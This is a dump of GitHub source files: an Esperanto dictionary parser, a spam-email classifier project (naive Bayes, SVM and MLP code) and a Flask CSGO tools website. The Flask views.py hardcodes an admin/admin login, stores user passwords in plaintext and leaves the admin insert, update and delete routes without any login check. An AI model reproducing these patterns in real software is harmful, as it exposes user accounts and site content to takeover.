"42e147c715bf14e445da8b9fc4503d1da703b469", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 112, "license_type": "no_license", "max_line_length": 29, "num_lines": 8, "path": "/mypy.ini", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "[mypy]\nexclude = build\n\n[mypy-fire.*]\nignore_missing_imports = true\n\n[mypy-lxml.*]\nignore_missing_imports = true" }, { "alpha_fraction": 0.5257560610771179, "alphanum_fraction": 0.5299102663993835, "avg_line_length": 33.388572692871094, "blob_id": "a3816aefaaea482e01a12549bea4f47decf1c1d8", "content_id": "f5e7f4997935fe1255959928d1b80b5b8b61a184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6024, "license_type": "no_license", "max_line_length": 88, "num_lines": 175, "path": "/eo_dicts/parser/string_with_format.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from enum import Enum\n\n# not using tpying.Self because mypy doesn't support it yet\nfrom typing import Optional, Union\n\n\nclass Format(Enum):\n ITALIC = \"italic\"\n BOLD = \"bold\"\n # Example sentence\n EKZ = \"ekz\"\n # Headword\n TLD = \"tld\"\n # Example: GEOG POL\n UZO_FAKO = \"fako\"\n\n\nclass StringWithFormat:\n def __init__(self, string: Optional[str] = None):\n self.string = string or \"\"\n self.format: dict[str, list[tuple[int, int]]] = {}\n\n @classmethod\n def join(\n cls, string_list: list[\"StringWithFormat\"], separator: str\n ) -> \"StringWithFormat\":\n if len(string_list) == 0:\n return StringWithFormat()\n base = string_list[0]\n for n, string in enumerate(string_list[1:]):\n if n < len(string_list) - 1:\n base += separator\n base += string\n return base\n\n def add(\n self,\n other: Union[str, \"StringWithFormat\"],\n format_type: Optional[Format] = None,\n keep_whitespace=False,\n ) -> \"StringWithFormat\":\n # print('ADD', repr(self), repr(self.format), repr(other), format_type)\n if format_type and format_type.value not in self.format:\n self.format[format_type.value] = []\n\n if isinstance(other, StringWithFormat):\n assert format_type is None\n # first string length\n n = len(self.string)\n self.add(other.string, keep_whitespace=keep_whitespace)\n for fmt, fmt_list in other.format.items():\n if fmt not in self.format:\n self.format[fmt] = []\n\n if (\n self.format[fmt]\n and self.format[fmt][-1][-1] == n\n and fmt_list\n and fmt_list[0][0] == 0\n ):\n # merge two formats in one\n self.format[fmt][-1] = (self.format[fmt][-1][0], n + fmt_list[0][1])\n fmt_list = fmt_list[1:]\n self.format[fmt] += [(start + n, end + n) for (start, end) in fmt_list]\n else:\n if format_type:\n last_format = self.format[format_type.value]\n if last_format and last_format[-1][-1] == len(self.string):\n last_format[-1] = (\n last_format[-1][0],\n len(self.string) + len(other),\n )\n else:\n self.format[format_type.value].append(\n (len(self.string), len(self.string) + len(other))\n )\n self.string += other\n return self\n\n def add_italic(self, other: Union[str, \"StringWithFormat\"]) -> \"StringWithFormat\":\n return self.add(other, Format.ITALIC)\n\n def add_bold(self, other: Union[str, \"StringWithFormat\"]) -> \"StringWithFormat\":\n return self.add(other, Format.BOLD)\n\n def apply_format(\n self, format_type: Union[list[Format], Format, None]\n ) -> \"StringWithFormat\":\n if not format_type:\n return self\n if isinstance(format_type, (list, tuple)):\n for format_t in format_type:\n self.apply_format(format_t)\n else:\n if format_type and format_type.value not in self.format:\n self.format[format_type.value] = []\n self.format[format_type.value].append((0, len(self.string)))\n return self\n\n def __add__(self, other: Union[str, \"StringWithFormat\"]) -> \"StringWithFormat\":\n return self.add(other)\n\n def prepend(self, other: str) -> \"StringWithFormat\":\n alt = StringWithFormat(other).add(self)\n self.string = alt.string\n self.format = alt.format\n return self\n\n def strip(self) -> \"StringWithFormat\":\n original = self.string\n base_len = len(original)\n new_format = dict(self.format)\n\n new_string = original.rstrip()\n if len(new_string) != base_len:\n for key in new_format:\n new_format[key] = [\n (a, min(len(new_string), b)) for (a, b) in new_format[key]\n ]\n\n base_len = len(new_string)\n new_string = new_string.lstrip()\n if len(new_string) != base_len:\n dif = base_len - len(new_string)\n for key in new_format:\n new_format[key] = [\n (max(0, a - dif), max(0, b - dif)) for (a, b) in new_format[key]\n ]\n\n new_string_format = StringWithFormat(new_string)\n new_string_format.format = new_format\n return new_string_format\n\n def encode_format(self) -> str:\n encoded = []\n for fmt, values in self.format.items():\n tmp_list = [\"%s,%s\" % item for item in values]\n encoded.append(\"%s:%s\" % (fmt, \";\".join(tmp_list)))\n return \"\\n\".join(encoded)\n\n def __eq__(self, other) -> bool:\n if isinstance(other, StringWithFormat):\n return self.string == other.string and self.format == other.format\n return False\n\n def __repr__(self) -> str:\n return \"<%s %s>\" % (self.__class__.__name__, repr(self.string))\n\n def __len__(self) -> int:\n return len(self.string)\n\n\ndef expand_tld(string: StringWithFormat) -> StringWithFormat:\n if not isinstance(string, StringWithFormat) or not string.format.get(\n Format.TLD.value\n ):\n return string\n boundaries = \" \\n:;;.,•?!()[]{}'\\\"„“\"\n original_format = string.format[Format.TLD.value]\n new_format = []\n for start, end in original_format:\n for i in range(start, -1, -1):\n if string.string[i] in boundaries:\n break\n start = i\n for i in range(end, len(string.string)):\n end = i\n if string.string[i] in boundaries:\n break\n else:\n end = len(string.string)\n new_format.append((start, end))\n\n string.format[Format.TLD.value] = new_format\n return string\n" } ]
17
Shashank-tech9/Advanced-Machine-Learning-Project
https://github.com/Shashank-tech9/Advanced-Machine-Learning-Project
f8c282c8f1d84bc451cfdf6b77d233d1802ad63e
c03afdbcbec25c792182f331f1edfecb677c42d4
d753aacf2489fb05dbc60e1f54c7c4e0be78151d
refs/heads/master
2020-09-21T13:23:44.646431
2019-12-04T21:51:05
2019-12-04T21:51:05
224,801,004
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5826917290687561, "alphanum_fraction": 0.5968586206436157, "avg_line_length": 26.508474349975586, "blob_id": "5ba1aa3d5c04e6ec761499382766b4146806ddde", "content_id": "b8e89146eb57ef5676a87e0648c0c770f0d68629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3247, "license_type": "no_license", "max_line_length": 119, "num_lines": 118, "path": "/load_all_data.py", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "import numpy as np\nimport re\nimport nltk\nfrom sklearn.datasets import load_files\nnltk.download('stopwords')\nimport pickle\nfrom nltk.corpus import stopwords\nnltk.download('wordnet')\nfrom nltk.stem import WordNetLemmatizer\n\ndef load_all_data(num_feature):\n\n movie_data = load_files(r\"./data_email/email_train\")\n X, y = movie_data.data, movie_data.target\n \n #print(\"X\", len(X));\n #print(\"y\", y.shape);\n #print(\"y\", y[0:20]);\n #print(\"X[0] \", X[0]);\n \n documents = []\n \n #nltk.download('wordnet')\n #from nltk.stem import WordNetLemmatizer\n \n stemmer = WordNetLemmatizer()\n \n for sen in range(0, len(X)):\n # Remove all the special characters\n document = re.sub(r'\\W+', ' ', str(X[sen]))\n \n # remove all single characters\n document = re.sub(r'\\s+[a-zA-Z]\\s+', ' ', document)\n \n # Remove single characters from the start\n document = re.sub(r'\\^[a-zA-Z]\\s+', ' ', document) \n \n # Substituting multiple spaces with single space\n document = re.sub(r'\\s+', ' ', document, flags=re.I)\n \n # Removing prefixed 'b'\n document = re.sub(r'^b\\s+', '', document)\n \n # Converting to Lowercase\n document = document.lower()\n \n # Lemmatization\n document = document.split()\n \n document = [stemmer.lemmatize(word) for word in document]\n document = ' '.join(document)\n \n documents.append(document)\n \n from sklearn.feature_extraction.text import CountVectorizer\n \n #print(\"document[0] \", documents[0])\n \n vectorizer = CountVectorizer(max_features=num_feature, min_df=5, max_df=0.7, stop_words=stopwords.words('english'))\n X = vectorizer.fit_transform(documents).toarray()\n \n #print(\"X\", len(X));\n #print(\"X[0]\", len(X[0]));\n #print(\"X[0]\", X[0])\n #print(\"vectorizer\", vectorizer)\n \n #from sklearn.feature_extraction.text import TfidfTransformer\n #tfidfconverter = TfidfTransformer()\n #X = tfidfconverter.fit_transform(X).toarray()\n \n #X = np.array(X)\n\n #X = np.transpose(X)\n #\n #print(\"X.shape\", X.shape)\n #print(\"y.shape\", y.shape)\n #\n ##y = np.invert(y)\n #\n ##np_ones = np.ones({y.shape});\n #\n ##y = (y*2) - (np_ones);\n #\n #collections_y = collections.Counter(y)\n #\n #print(\"collections_y\", collections_y)\n\n #train_data = X[:, 0:4000]\n #train_labels = y[0:4000]\n\n #test_data = X[:,4001:]\n #test_labels = y[4001:]\n\n #num_words = X.shape[1]\n #num_training = train_labels.shape[0]\n #num_testing = test_labels.shape[0]\n\n #print(\"train_data_shape\", train_data.shape);\n #print(\"test_data_shape\", test_data.shape);\n\n #print(\"train_labels_shape\", train_labels.shape);\n #print(\"test_labels_shape\", test_labels.shape);\n\n #print(\"num_words\", num_words);\n #print(\"num_testing\", num_testing);\n #print(\"num_training\", num_training);\n\n return X, y\n\n\n \n\n#load_all_data(10)\n \n \n #from sklearn.feature_extraction.text import TfidfVectorizer\n #tfidfconverter = TfidfVectorizer(max_features=1500, min_df=5, max_df=0.7, stop_words=stopwords.words('english'))\n #X = tfidfconverter.fit_transform(documents).toarray()\n\n" }, { "alpha_fraction": 0.6393638253211975, "alphanum_fraction": 0.6477137207984924, "avg_line_length": 31.230770111083984, "blob_id": "75cdd4fef9841c01a09ad8c5957bf5c3e69ca813", "content_id": "b1fccab49207fc4468dfd71c0de9ac4f31b4193a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 99, "num_lines": 78, "path": "/naive_bayes.py", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "\"\"\"This module includes methods for training and predicting using naive Bayes.\"\"\"\nimport numpy as np\nimport math as math\n\n\ndef naive_bayes_train(train_data, train_labels, params):\n \"\"\"Train naive Bayes parameters from data.\n\n :param train_data: d x n numpy matrix (ndarray) of d binary features for n examples\n :type train_data: ndarray\n :param train_labels: length n numpy vector with integer labels\n :type train_labels: array_like\n :param params: learning algorithm parameter dictionary. Must include an 'alpha' value\n :type params: dict\n :return: model learned with the priors and conditional probabilities of each feature\n :rtype: model\n \"\"\"\n # TODO: INSERT YOUR CODE HERE TO LEARN THE PARAMETERS FOR NAIVE BAYES\n\n alpha = params['alpha']\n #alpha = 1e-5\n\n labels = np.unique(train_labels)\n\n d, n = train_data.shape\n num_classes = labels.size\n\n cond_prb = np.ones(shape =(num_classes, d+1))\n\n for i in range(0,num_classes):\n current_label = labels[i]\n num_current_label = np.sum(train_labels == labels[i])\n current_label_prb = (num_current_label + alpha) / (n + num_classes*alpha)\n cond_prb[i, 0] = current_label_prb\n\n for i in range(0,num_classes):\n num_y = np.sum(train_labels == labels[i])\n data_with_label = train_data[:, train_labels == labels[i]]\n num_y_and_x = data_with_label.dot(np.ones(data_with_label.shape[1]))\n\n cond_prb[i,1:] = (num_y_and_x + alpha) / (num_y + (2*alpha))\n\n model = cond_prb\n\n return model\n\n\ndef naive_bayes_predict(data, model):\n \"\"\"Use trained naive Bayes parameters to predict the class with highest conditional likelihood.\n\n :param data: d x n numpy matrix (ndarray) of d binary features for n examples\n :type data: ndarray\n :param model: learned naive Bayes model\n :type model: dict\n :return: length n numpy array of the predicted class labels\n :rtype: array_like\n \"\"\"\n # TODO: INSERT YOUR CODE HERE FOR USING THE LEARNED NAIVE BAYES PARAMETERS\n # TO CLASSIFY THE DATA\n\n d,n = data.shape\n prediction = np.ones(n)\n num_classes = model.shape[0]\n\n cond_prb = model[:,1:];\n not_cond_prb = 1-cond_prb\n\n cond_prb = np.log(cond_prb)\n not_cond_prb = np.log(not_cond_prb)\n\n for i in range(0,n):\n feature_i = data[:,i]\n t1 = np.dot(cond_prb, feature_i)\n t2 = np.dot(not_cond_prb, 1-feature_i)\n t3 = (t1+t2)+np.log(model[:,0])\n prediction[i] = t3.argmax()\n\n return prediction\n\n" }, { "alpha_fraction": 0.6041204333305359, "alphanum_fraction": 0.617443859577179, "avg_line_length": 36.01369857788086, "blob_id": "2ca28f3739b96b3b5a3ff58b2214c6116f1b8a5b", "content_id": "97287d5a2b1900ab98dbfa510c0ba54ac5428fde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8106, "license_type": "no_license", "max_line_length": 188, "num_lines": 219, "path": "/README.md", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "# Advanced-Machine-Learning-Project\nFinal Project for the course \"Advanced Machine Learning\".\n\nIn this project we aim to classify spam messages from 2 datasets of emails, using Four algorithms: \n1) Naive Bayes\n2) Muli level perceptron \n3) Support Vector Machine and \n4) Relevance Vector Machine\n# Databases \nThe fopllowing the are the databases which we used :\n\ndata_email\n\nWe have used the following libraries:\n\nSklearn\n\nquadprog\n# Jupyter Notebook code\n```\nimport numpy as np\n#from decision_tree import calculate_information_gain\n#from decision_tree import decision_tree_train\n#from decision_tree import decision_tree_predict\n#from decision_tree import recursive_tree_train\nfrom scipy.io import loadmat\nfrom naive_bayes import naive_bayes_train, naive_bayes_predict\nfrom load_all_data import *\nfrom manipulate_data_nb import *\nfrom manipulate_data_mlp import *\nfrom manipulate_data_svm import *\nfrom manipulate_data_rvm import *\nfrom crossval import cross_validate\nfrom mlp import mlp_train, mlp_predict, logistic, nll\nfrom kernelsvm import kernel_svm_train, kernel_svm_predict\nfrom skrvm import RVC\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\nimport copy\n```\n\nWe test each of the 4 algorithms for 6 values of feature size \n```\nfeature_size = [25, 50, 75, 100, 125, 150]\n#feature_size = [25]\n\nnb_test_accuracy1 = [None] * len(feature_size)\nnb_train_accuracy1 = [None] * len(feature_size)\n\nmlp_test_accuracy1 = [None] * len(feature_size)\nmlp_train_accuracy1 = [None] * len(feature_size)\n\nsvm_test_accuracy1 = [None] * len(feature_size)\nsvm_train_accuracy1 = [None] * len(feature_size)\n\nrvm_test_accuracy1 = [None] * len(feature_size)\nrvm_train_accuracy1 = [None] * len(feature_size)\n\n\n\nX = [None] * len(feature_size)\ny = [None] * len(feature_size)\n\nfor i in range(len(feature_size)):\n X[i], y[i] = load_all_data(feature_size[i])\n```\n\nAccuracy Test for Naive-Bayes\n```\nnb_params = { 'alpha': 1.0 }\n\nfor i in range(len(feature_size)):\n num_words_nb, num_training_nb, num_testing_nb, train_data_nb, test_data_nb, train_labels_nb, test_labels_nb = manipulate_data_nb(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n \n #print(\"test_labels\", test_labels_nb);\n #print(\"teat_data\", test_data_nb[0:20,0:20]) \n \n nb_model = naive_bayes_train(train_data_nb, train_labels_nb, nb_params)\n \n print(\"Feature size: %d\" % feature_size[i])\n \n nb_train_predictions = naive_bayes_predict(train_data_nb, nb_model)\n nb_train_accuracy = np.mean(nb_train_predictions == train_labels_nb)\n print(\"Naive Bayes training accuracy: %f\" % nb_train_accuracy)\n \n nb_test_predictions = naive_bayes_predict(test_data_nb, nb_model)\n nb_test_accuracy = np.mean(nb_test_predictions == test_labels_nb)\n print(\"Naive Bayes testing accuracy: %f\" % nb_test_accuracy)\n \n nb_test_accuracy1[i] = nb_test_accuracy\n nb_train_accuracy1[i] = nb_train_accuracy\n```\n\nAccuracy test for Multi level Perceptron\n```\nnum_folds = 4\nstructures = [[3]]\nlambda_vals = [0.01, 0.1]\nparams = {\n 'max_iter': 10000,\n #'max_iter': 100,\n 'squash_function': logistic,\n 'loss_function': nll\n}\n \nbest_params = []\nbest_score = 0\nfor i in range(len(feature_size)):\n num_words_mlp, num_training_mlp, num_testing_mlp, train_data_mlp, test_data_mlp, train_labels_mlp, test_labels_mlp = manipulate_data_mlp(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n #print(\"test_labels\", test_labels_mlp[0:20]);\n #print(\"teat_data\", test_data_mlp[0:20,0:20]) \n \n for j in range(len(structures)):\n for k in range(len(lambda_vals)):\n params['num_hidden_units']= structures[j]\n params['lambda'] = lambda_vals[k]\n #print(\"lambda\", lambda_vals[k]);\n #print(\"structure\", structures[j]);\n \n cv_score, models = cross_validate(mlp_train, mlp_predict, train_data_mlp, train_labels_mlp, num_folds, params)\n \n #print(\"cv_score\", cv_score);\n \n if cv_score > best_score:\n best_score = cv_score\n best_params = copy.copy(params)\n \n print(\"Feature size: %d\" % feature_size[i])\n \n mlp_model = mlp_train(train_data_mlp, train_labels_mlp, best_params)\n predictions, _, _, _ = mlp_predict(test_data_mlp, mlp_model)\n test_accuracy = np.mean(predictions == test_labels_mlp)\n \n print(\"MLP had test accuracy %f\" % (test_accuracy))\n \n predictions, _, _, _ = mlp_predict(train_data_mlp, mlp_model)\n train_accuracy = np.mean(predictions == train_labels_mlp)\n print(\"MLP had train accuracy %f\" % (train_accuracy))\n print(\"with structure %s and lambda = %f\" % (repr(best_params['num_hidden_units']), best_params['lambda']))\n \n mlp_test_accuracy1[i] = test_accuracy\n mlp_train_accuracy1[i] = train_accuracy\n ```\n\nAccuracy test for Support Vector Machine\n ```\n num_folds = 4\nc_vals = 10 ** np.linspace(-1, 3, 4)\nsigmas = np.linspace(0.1, 7, 15)\n#sigmas = [4.5]\nbest_params_svm = {\n 'kernel': 'rbf',\n 'C': c_vals[0],\n 'sigma': sigmas[0]\n }\nbest_score = 0\n\nfor i in range(len(feature_size)):\n num_words_svm, num_training_svm, num_testing_svm, train_data_svm, test_data_svm, train_labels_svm, test_labels_svm = manipulate_data_svm(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n\n #print(\"test_labels\", test_labels_svm[0:20]);\n #print(\"teat_data\", test_data_svm[0:20,0:20]); \n\n for j in range(len(c_vals)):\n for k in range(len(sigmas)):\n params = {\n 'kernel': 'rbf',\n 'C': c_vals[j],\n 'sigma': sigmas[k]\n }\n \n cv_score, _ = cross_validate(kernel_svm_train, kernel_svm_predict, train_data_svm, train_labels_svm, num_folds, params)\n \n print(\"cv_score\", cv_score);\n #print(j, \" | \", k);\n \n if cv_score > best_score:\n best_score = cv_score\n best_params_svm['kernel'] = params['kernel']\n best_params_svm['C'] = params['C']\n best_params_svm['sigma'] = params['sigma']\n \n print(\"Feature size: %d\" % feature_size[i])\n \n rbf_svm_model = kernel_svm_train(train_data_svm, train_labels_svm, best_params_svm)\n predictions, _ = kernel_svm_predict(test_data_svm, rbf_svm_model)\n test_accuracy = np.mean(predictions == test_labels_svm)\n \n print(\"RBF SVM had test accuracy %f\" % (test_accuracy))\n \n predictions, _ = kernel_svm_predict(train_data_svm, rbf_svm_model)\n train_accuracy = np.mean(predictions == train_labels_svm)\n \n print(\"RBF SVM had train accuracy %f\" % (train_accuracy))\n print(\"with C = %f, sigma = %f\" % (best_params_svm['C'], best_params_svm['sigma']))\n \n svm_test_accuracy1[i] = test_accuracy\n svm_train_accuracy1[i] = train_accuracy\n```\n\nAccuracy Test for RVM\n```\nfor i in range(len(feature_size)):\n #print(\"X[i]\", X[i].shape)\n #print(\"Y[i]\", y[i].shape)\n num_words_rvm, num_training_rvm, num_testing_rvm, train_data_rvm, test_data_rvm, train_labels_rvm, test_labels_rvm = manipulate_data_rvm(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n #print(\"train_data_rvm\", train_data_rvm.shape)\n #print(\"train_label_rvm\", train_labels_rvm.shape)\n clf = RVC(kernel='rbf', n_iter=10, n_iter_posterior=10, threshold_alpha=10000.0, verbose=False)\n clf.fit(train_data_rvm, train_labels_rvm)\n test_accuracy = clf.score(test_data_rvm, test_labels_rvm)\n print(\"Feature size: %d\" % feature_size[i])\n print(\"RBF RVM had test accuracy %f\" % (test_accuracy))\n train_accuracy = clf.score(train_data_rvm, train_labels_rvm)\n print(\"RBF RVM had train accuracy %f\" % (train_accuracy))\n \n rvm_test_accuracy1[i] = test_accuracy\n rvm_train_accuracy1[i] = train_accuracy\n ```\n" }, { "alpha_fraction": 0.6012104749679565, "alphanum_fraction": 0.6119704246520996, "avg_line_length": 23.78333282470703, "blob_id": "8d9db09c138962091b13e4b96e8cd0a8f4af022a", "content_id": "94cad280cfbc173ae337056d60cc434db2b27bf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1487, "license_type": "no_license", "max_line_length": 97, "num_lines": 60, "path": "/manipulate_data_svm.py", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "import numpy as np\n#import re\n#import nltk\nfrom sklearn.datasets import load_files\n#import pickle\n#from nltk.corpus import stopwords\nimport collections\n\ndef manipulate_data_svm(X, y):\n #from sklearn.feature_extraction.text import TfidfTransformer\n #tfidfconverter = TfidfTransformer()\n #X = tfidfconverter.fit_transform(X).toarray()\n\n X = np.array(X)\n\n X = np.transpose(X)\n \n #print(\"X.shape\", X.shape)\n #print(\"y.shape\", y.shape)\n \n #y = np.invert(y)\n \n #np_ones = np.ones({y.shape});\n \n #y = (y*2) - (np_ones);\n\n for i in range(y.shape[0]):\n if(y[i]<=0):\n y[i] = -1;\n else:\n y[i] = 1;\n\n \n #collections_y = collections.Counter(y)\n \n #print(\"collections_y\", collections_y)\n\n train_count = int(len(y)*0.667);\n\n train_data = X[:, 0:train_count]\n train_labels = y[0:train_count]\n\n test_data = X[:,(train_count+1):]\n test_labels = y[(train_count+1):]\n\n num_words = X.shape[1]\n num_training = train_labels.shape[0]\n num_testing = test_labels.shape[0]\n\n #print(\"train_data_shape\", train_data.shape);\n #print(\"test_data_shape\", test_data.shape);\n\n #print(\"train_labels_shape\", train_labels.shape);\n #print(\"test_labels_shape\", test_labels.shape);\n\n #print(\"num_words\", num_words);\n #print(\"num_testing\", num_testing);\n #print(\"num_training\", num_training);\n\n return num_words, num_training, num_testing, train_data, test_data, train_labels, test_labels\n" } ]
4
MyFaith/flask-csgo-tools
https://github.com/MyFaith/flask-csgo-tools
32454f73c64328d2a76e81bc2b62676c0a2bc47d
dcc79400b07c367efce9a7bc2b482ccc816ef9c2
854547bb3aeef47f806f5130930585afd0c3561d
refs/heads/master
2019-03-18T10:20:07.546685
2017-04-27T12:42:45
2017-04-27T12:42:45
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5509889721870422, "alphanum_fraction": 0.5534292459487915, "avg_line_length": 26.71174430847168, "blob_id": "564b3eb61605ad85a0c76e84cfbe3d53dc99d995", "content_id": "9a1971cc99b88c030042716297137e70f3016274", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8076, "license_type": "permissive", "max_line_length": 103, "num_lines": 281, "path": "/app/views.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nfrom app import app, db, redirect, render_template, session, url_for\nfrom bson import ObjectId\nfrom app.forms import register_form, login_form, admin_login_form, admin_article_form, comment_add_form\nimport time, pymongo\n\n# type 1:Article 2:Video\n\n# 获取当前时间\ndef get_time():\n now_time = time.strftime('%Y-%m-%d %X', time.gmtime(time.time()))\n return now_time\n\n# 404\[email protected](404)\ndef page_not_found(error):\n return render_template('404.html'), 404\n\n# 首页\[email protected]('/')\ndef index():\n article = db.Article.find().sort('sendtime', pymongo.DESCENDING)\n return render_template('index.html', article=article)\n\n# 文章页\[email protected]('/article')\ndef article():\n article = db.Article.find({\n 'type': '1'\n }).sort('sendtime', pymongo.DESCENDING)\n return render_template('article.html', article=article)\n\n# 视频页\[email protected]('/video')\ndef video():\n article = db.Article.find({\n 'type': '2'\n }).sort('sendtime', pymongo.DESCENDING)\n return render_template('video.html', article=article)\n\n# 工具箱\[email protected]('/toolbox')\ndef tool():\n return render_template('toolbox.html')\n\n# 查看文章页\[email protected]('/view/<id>', methods=['GET', 'POST'])\ndef view(id):\n oid = ObjectId(id)\n form = comment_add_form()\n article = db.Article.find_one({\n '_id': oid\n })\n if form.validate_on_submit():\n # 添加评论\n user = db.User.find_one({'username': session['login_status']})\n username = session['login_status']\n content = form.content.data\n avatar = user['avatar']\n sendtime = get_time()\n comments = article['comments']\n # 设置评论集合\n comments.append({\n 'username': username,\n 'content': content,\n 'avatar': avatar,\n 'sendtime': sendtime\n })\n # 更新\n db.Article.update({\n '_id': oid\n },{\n '$set': {\n 'comments': comments\n }\n })\n return redirect('/view/%s'%id)\n else:\n # 增加阅读\n readed = int(article['readed']) + 1\n db.Article.update({\n '_id': oid\n }, {\n '$set': {\n 'readed': readed\n }\n })\n return render_template('view.html', title=article['title'], article=article, form=form)\n\n# 贴纸生成\[email protected]('/sticker')\ndef sticker():\n return render_template('toolbox/sticker.html')\n\n# 按键绑定\[email protected]('/keybind')\ndef keybind():\n return render_template('toolbox/keybind.html')\n\n# 个人资料生成\[email protected]('/profile')\ndef profile():\n return render_template('toolbox/profile.html')\n\n# 注册\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n form = register_form()\n if form.validate_on_submit():\n # 注册\n username = form.username.data\n password = form.password.data\n repassword = form.repassword.data\n email = form.email.data\n reg_time = get_time()\n avatar = '/static/images/steam_avatar.jpg'\n # 查询是否已存在\n query_result = db.User.find_one({\n 'username': username\n })\n if(query_result):\n # 存在\n form.username.errors.append('用户名已存在')\n return render_template('user/register.html', form=form)\n else:\n db.User.insert({\n 'username': username,\n 'password': password,\n 'repassword': repassword,\n 'email': email,\n 'reg_time': reg_time,\n 'avatar': avatar\n })\n # 不存在\n return redirect('/login')\n else:\n return render_template('user/register.html', form=form)\n\n# 登录\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n form = login_form()\n if form.validate_on_submit():\n # 登录\n username = form.username.data\n password = form.password.data\n # 查询是否存在\n query_result = db.User.find_one({\n 'username': username,\n 'password': password\n })\n if (query_result):\n # 存在\n session['login_status'] = username\n return redirect('/')\n else:\n # 不存在\n form.username.errors.append('用户名或密码错误')\n return render_template('user/login.html', form=form)\n else:\n return render_template('user/login.html', form=form)\n\n# 退出登录\[email protected]('/logout')\ndef logout():\n try:\n session.pop('login_status')\n except KeyError:\n print('Can\\'t find key <login_status>')\n return redirect('/')\n\n# -------------------后台-------------------\n\n# 登录页\[email protected]('/admin', methods=['GET', 'POST'])\ndef admin():\n form = admin_login_form()\n username = form.username.data\n password = form.password.data\n if form.validate_on_submit():\n if username == 'admin' and password == 'admin':\n session['admin_login_status'] = username\n return redirect('/admin_index')\n else:\n form.admin_username.errors.append('管理员账号或密码错误')\n return render_template('admin/admin_login.html', form=form)\n else:\n return render_template('admin/admin_login.html', form=form)\n\n# 首页\[email protected]('/admin_index', methods=['GET', 'POST'])\ndef admin_index():\n status = None\n try:\n status = session['admin_login_status']\n except KeyError:\n print('Can\\'t find key <admin_login_status>')\n\n # 如果未登录\n if status is None:\n # 返回登录页面\n return redirect('/admin')\n else:\n article = db.Article.find().sort('sendtime', pymongo.DESCENDING)\n return render_template('admin/admin_index.html', article=article)\n\n# 新增内容\[email protected]('/admin_insert', methods=['GET', 'POST'])\ndef admin_insert():\n form = admin_article_form()\n if form.validate_on_submit():\n title = form.title.data\n content = form.content.data\n description = form.description.data\n author = session['admin_login_status']\n list_img = form.list_img.data\n type = form.type.data\n sendtime = get_time()\n readed = '0'\n comments = []\n # 增加数据\n db.Article.insert({\n 'title': title,\n 'content': content,\n 'description': description,\n 'author': author,\n 'list_img': list_img,\n 'type': type,\n 'sendtime': sendtime,\n 'readed': readed,\n 'comments': comments\n })\n return redirect('/admin_index')\n else:\n return render_template('admin/admin_insert.html', form=form)\n\n# 修改内容\[email protected]('/admin_update/<id>', methods=['GET', 'POST'])\ndef admin_update(id):\n oid = ObjectId(id)\n form = admin_article_form()\n query_result = db.Article.find_one({\n '_id': oid\n })\n if form.validate_on_submit():\n title = form.title.data\n description = form.description.data\n list_img = form.list_img.data\n content = form.content.data\n type = form.type.data\n\n db.Article.update({\n '_id': oid\n },{\n '$set':{\n 'title': title,\n 'content': content,\n 'description': description,\n 'list_img': list_img,\n 'type': type\n }\n })\n return redirect('/admin_index')\n else:\n form.title.data = query_result['title']\n form.content.data = query_result['content']\n form.description.data = query_result['description']\n form.list_img.data = query_result['list_img']\n form.type.data = query_result['type']\n\n return render_template('admin/admin_update.html', form=form)\n\n# 删除内容\[email protected]('/admin_delete/<id>')\ndef admin_delete(id):\n oid = ObjectId(id)\n db.Article.remove({\n '_id': oid\n })\n return redirect('/admin_index')" }, { "alpha_fraction": 0.584856390953064, "alphanum_fraction": 0.5900783538818359, "avg_line_length": 13.222222328186035, "blob_id": "f0ec14b0d2419549cf953618037d5d43f4731598", "content_id": "d210b5e130685e16e5336d38747e2bfe6363b8b4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 651, "license_type": "permissive", "max_line_length": 29, "num_lines": 27, "path": "/README.md", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "## 基于Python-Flask开发的CSGO工具类网站\n\n#### 使用到:\n- Python3\n- Flask\n- Flask-WTForms\n- Pymongo\n- Mongodb\n- Semantic-UI\n- Jinja2\n- Simditor\n\n#### 待做\n- [x] 一键购买\n- [x] 选手签名贴纸生成\n- [x] 用户资料生成\n- [x] bug:用户资料页导航所有字体变小\n- [x] 前台登录(页面+功能)\n- [x] 前台注册(页面+功能)\n- [x] 前台文章评论(页面+功能)\n- [x] 后台文章列表(页面+功能)\n- [x] 后台添加文章(页面+功能)\n- [x] 后台修改文章(页面+功能)\n- [x] 后台删除文章(页面+功能)\n- [x] 后台富文本编辑器\n- [ ] 搜索(暂停)\n- [ ] 后台用户动态获取(暂停)" }, { "alpha_fraction": 0.42885375022888184, "alphanum_fraction": 0.47537878155708313, "avg_line_length": 35.47146987915039, "blob_id": "b154411bbd567102f50246dca82fe4b3fd472844", "content_id": 